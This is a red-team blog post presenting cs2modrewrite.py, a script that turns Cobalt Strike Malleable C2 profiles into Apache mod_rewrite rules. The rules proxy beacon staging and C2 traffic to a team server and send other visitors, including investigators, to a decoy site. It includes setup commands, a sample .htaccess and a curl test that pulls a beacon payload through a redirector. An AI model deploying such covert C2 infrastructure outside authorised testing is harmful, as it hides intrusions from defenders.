Automating Apache mod_rewrite and Cobalt Strike Malleable C2 for Intelligent Redirection

By February 1, 2018Cobalt Strike, Red Teaming

This post describes a script I created to convert a Cobalt Strike Malleable C2 profile to corresponding mod_rewrite rules to enable intelligent HTTP proxying for redirection of C2 traffic.  The script automates the process described by well known redteamer and now co-worker – Jeff Dimmock (@bluscreenofjeff). Intelligent use of C2 redirectors is core to a mature C2 architecture that can withstand some gentle investigation and prodding. Developing Cobalt Strike compatible mod_rewrite rules to redirect traffic is not incredibly difficult, but there are a few Apache “gotchas” and the process can be error prone when dealing with multiple C2 profiles. Automation improves consistency and reduces the time needed to spin-up, test, and troubleshoot a unique and layered C2 infrastructure. It is always nice to start from a known good.

Highlights of cs2modrewrite.py

  • Rewrite Rules based on valid C2 URIs (HTTP GET, POST, and Stager) and specified User-Agent string. Result: Only requests to valid C2 URIs with a specified UA string will be proxied to the Team Server by default.
  • Uses a custom Malleable C2 profile to build a .htaccess file with corresponding mod_rewrite rules
  • Supports the most recent Cobalt Strike 3.10 profile features
  • HTTP or HTTPS proxying to the Cobalt Strike Team Server
  • HTTP 302 Redirection to a Legitimate Site for Non-Matching Requests

Quick Start

  • Run Cobalt Strike’s c2lint profile validation tool to ensure your chosen C2 profile is functional.
    ./c2lint havex.profile
  • Run cs2modrewrite.py against the C2 profile.
    python ./cs2modrewrite.py -i havex.profile -c http://<myc2domain.com> -d http://<totallylegitsite.com>
  • Save the output to the web root directory (/var/www/html/.htaccess)
  • Modify/tweak the .htaccess file as needed.
  • Ensure your Apache installation will honor the new .htaccess file.
    • Enable the necessary Apache modules for redirection support.
      a2enmod rewrite proxy proxy_http
    • Modify the directory block in the /etc/apache2/apache.conf to resemble the following. The key here is to ensure AllowOverride is set to “All” rather than “None”.
      <Directory /var/www/html/>
       Options Indexes FollowSymLinks
       AllowOverride All
       Require all granted
      </Directory>
    • Restart your Apache instance after enabling new modules and changing the config. Subsequent .htaccess file changes should not require a restart or reload.
      service apache2 restart
  • Test, test, test…
    • Perform some quick initial testing and verification of your mod_rewrite rules with the curl command before attempting to generate and execute any beacons.
      # This command should match the mod_rewrite stager rules and result in proxying of the beacon payload 
      $ curl -H "User-Agent: My Custom UA" http://redirector.com/<stagerui>
      
      # This command should redirect to your chosen benign site
      $ curl -H "User-Agent: Blue Forces UA" http://redirector.com/<stagerui>

Usage

The script can be found at: https://github.com/threatexpress/cs2modrewrite

Arguments

cs2modrewrite.py [-h] [-i INPUTFILE] [-c C2SERVER] [-d DESTINATION]

Converts Cobalt Strike profiles to Apache mod_rewrite .htaccess file format by
using the User-Agent and URI Endpoint to create rewrite rules. Make sure the
profile passes a c2lint check before running this sript.

optional arguments:
  -h, --help      show this help message and exit
  -i INPUTFILE    C2 Profile file
  -c C2SERVER     C2 Server (http://teamserver)
  -d DESTINATION  (Optional) Redirect to this URL (http://google.com)

Example Output

#### Save the following as .htaccess in the root web directory

########################################
## .htaccess START 
RewriteEngine On

## (Optional)
## Scripted Web Delivery 
## Uncomment and adjust as needed
#RewriteCond %{REQUEST_URI} ^/css/style1.css?$
#RewriteCond %{HTTP_USER_AGENT} ^$
#RewriteRule ^.*$ "http://TEAMSERVER%{REQUEST_URI}" [P,L]

## Default Beacon Staging Support (/1234)
RewriteCond %{REQUEST_URI} ^/..../?$
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows; U; MSIE 7.0; Windows NT 5.2\) Java/1.5.0_08"
RewriteRule ^.*$ "http://TEAMSERVER%{REQUEST_URI}" [P,L]

## C2 Traffic (HTTP-GET, HTTP-POST, HTTP-STAGER URIs)
## Logic: If a requested URI AND the User-Agent matches, proxy the connection to the Teamserver
## Consider adding other HTTP checks to fine tune the check.  (HTTP Cookie, HTTP Referer, HTTP Query String, etc)
## Refer to http://httpd.apache.org/docs/current/mod/mod_rewrite.html
## Profile URIs
RewriteCond %{REQUEST_URI} ^(/include/template/isx.php.*|/wp06/wp-includes/po.php.*|/wp08/wp-includes/dtcla.php.*|/modules/mod_search.php.*|/blog/wp-includes/pomo/src.php.*|/includes/phpmailer/class.pop3.php.*|/api/516280565958.*|/api/516280565959.*)$
## Profile UserAgent
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows; U; MSIE 7.0; Windows NT 5.2\) Java/1.5.0_08"
RewriteRule ^.*$ "https://TEAMSERVER%{REQUEST_URI}" [P,L]

## Redirect all other traffic here
RewriteRule ^.*$ HTTPS://GOHERE/? [L,R=302]

## .htaccess END
########################################

What does this .htaccess do?

Staging: When Apache receives an HTTP request with the User-Agent Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_080 and a 4 character URI, it proxies the traffic to the teamserver.

C2 Traffic: When Apache receives an HTTP request with the User-Agent Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_080 and one of the following URIs (/include/template/isx.php.|/wp06/wp-includes/po.php.|/wp08/wp-includes/dtcla.php,/modules/mod_search.php,/blog/wp-includes/pomo/src.php,/includes/phpmailer/class.pop3.php,/api/516280565958,/api/516280565959), it proxies the traffic to the teamserver.

Catch All: Any traffic that doesn’t match a rule redirects the request using an HTTP 302

Summary

TLDR; The python script cs2modrewrite.py automates the process of creating a Malleable C2 compatible .htaccess file for intelligent redirection with Apache mod_rewrite. Try it out and feel free to give feedback and suggestions at @joevest on Twitter and on the ThreatExpress GitHub repo.

For more details on developing C2 architecture, check out the Red Team Infrastructure Wiki.

References


				
									
			

About Joe Vest

Joe Vest has worked in the information technology industry for over 17 years with a focus on red teaming, penetration testing and application security. Joe is an author of the SANS Red Team Operations and Threat Emulation course (SEC-564). As a former technical lead for a DoD red team, he has extensive knowledge of cyber threats and their tools, tactics and techniques, including threat emulation and threat detection. Joe is the co-founder of the security consulting company MINIS LLC (Merged with SpecterOps in 2017). As a leading security professional, he has achieved numerous security certifications: OSCP, CISSP-ISSMP, CISA, GPEN, GCIH, GWAPT, CEH, Security+